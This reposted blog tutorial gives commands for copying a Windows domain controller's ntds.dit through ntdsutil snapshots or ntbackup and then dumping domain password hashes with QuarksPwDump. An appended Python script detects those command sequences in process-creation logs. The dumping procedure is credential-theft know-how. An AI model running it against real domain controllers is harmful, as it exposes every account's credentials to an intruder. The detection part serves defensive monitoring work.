• Methods for exporting domain controller hashes on Windows 2003, Windows 2008, and Windows 2012


    Usage as described by the QuarksPwDump author:

    1. Windows 2008
       
      Microsoft recently implemented VSS (Volume Shadow Copy Service), which allows an administrator to make
      filesystem snapshots while the operating system is running and writing to the files currently being backed up.
       
      Here is a way to backup NTDS.dit file while a domain controller is running:
       
      #ntdsutil
      #snapshot
      #activate instance ntds
      #create
      #mount {GUID}
      #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
      #unmount {GUID}
      #quit
      #quit
       
      If the AD server does not have the "AD DS role", you have to use the dsdbutil.exe command in the same way.
       
       
       
     2. Windows 2003  
      On this version, VSS has been implemented but not NTDS-type snapshots.
      But you can use the ntbackup tool. Here is the procedure:
       
      - Launch NTBACKUP gui
      - Use backup wizard (advanced)
      - Choose to save system state only and choose output filename
      - Wait some minutes
      - Use restore wizard (advanced)
      - Choose your backup, click next and use advanced button
      - Choose to restore file on another location (c:\tmp for example)
      - Choose to overwrite everything and next uncheck all restoration parameters
      - Validate and wait some minutes
      - Open a command shell to "c:\tmp\Active Directory"
      - We need to repair the database with this command
      #esentutl /p ntds.dit
      - Validate warning and wait some minutes
       
      ntds.dit file can now be used with quarkspwdump.

    Of these, the following:

    #ntdsutil
    #snapshot
    #activate instance ntds
    #create
    #mount {GUID}
    #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
    #unmount {GUID}
    #quit
    #quit

    applies when you have an interactive session or are logged on directly.

    With a semi-interactive shell, the following approach can be used (a usage found online):

    ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
    ntdsutil  snapshot  "mount {GUID}"  quit  quit
    copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit
    ntdsutil  snapshot  "unmount {GUID}"  quit  quit
    ntdsutil  snapshot  "delete {GUID}"  quit  quit

    Finally:

    QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit
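
The command sequences above leave recognisable traces in process-creation logs. As an added example (not from the original post or the QuarksPwDump project), this Python script classifies logged command lines by stage and raises severity when a snapshot create/mount is followed by a copy of ntds.dit on the same host; the event tuples, stage names and one-hour window are constructed assumptions.

```python
import re

# Stage patterns derived from the commands shown on this page.
# Stage names are hypothetical labels chosen for this example.
STAGES = [
    ("snapshot_create", re.compile(r"\bntdsutil\b.*\bsnapshot\b.*\bcreate\b", re.I)),
    ("snapshot_mount", re.compile(r"\bntdsutil\b.*\bsnapshot\b.*\bmount\b", re.I)),
    ("snapshot_cleanup", re.compile(r"\bntdsutil\b.*\bsnapshot\b.*\b(unmount|delete)\b", re.I)),
    ("ntds_copy", re.compile(r"\b(copy|xcopy|robocopy)\b.*\bntds\.dit\b", re.I)),
    ("esentutl_repair", re.compile(r"\besentutl\b.*/p\b.*\bntds\.dit\b", re.I)),
    ("offline_parse", re.compile(r"--ntds-file\b", re.I)),
]

def classify(cmdline):
    """Return every stage name whose pattern matches the command line."""
    return [name for name, rx in STAGES if rx.search(cmdline)]

def correlate(events, window=3600):
    """events: (epoch_seconds, host, command_line) tuples.
    Returns {host: {"stages": [...], "severity": "high"|"medium"}}; severity is
    high when a snapshot create/mount precedes an ntds.dit copy within `window`."""
    hits = {}
    for ts, host, cmd in events:
        for stage in classify(cmd):
            hits.setdefault(host, []).append((ts, stage))
    alerts = {}
    for host, seen in hits.items():
        snaps = [t for t, s in seen if s in ("snapshot_create", "snapshot_mount")]
        copies = [t for t, s in seen if s == "ntds_copy"]
        chained = any(0 <= c - s <= window for s in snaps for c in copies)
        alerts[host] = {"stages": sorted({s for _, s in seen}),
                        "severity": "high" if chained else "medium"}
    return alerts

# Constructed sample process-creation events (not real logs).
SAMPLE_EVENTS = [
    (1000, "DC01", 'ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit'),
    (1030, "DC01", 'ntdsutil  snapshot  "mount {GUID}"  quit  quit'),
    (1060, "DC01", r'cmd.exe /c copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit'),
    (1090, "DC01", 'ntdsutil  snapshot  "unmount {GUID}"  quit  quit'),
    (2000, "DC02", r'esentutl /p C:\restore\ntds.dit'),
    (3000, "FS01", 'ntdsutil "activate instance ntds" files info quit quit'),
]

if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert["severity"], ", ".join(alert["stages"]))
```

Commands typed inside an interactive ntdsutil prompt do not appear in command-line logging, so only the one-line form is visible to this check.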
  • Original article: https://www.cnblogs.com/landuo11/p/7492458.html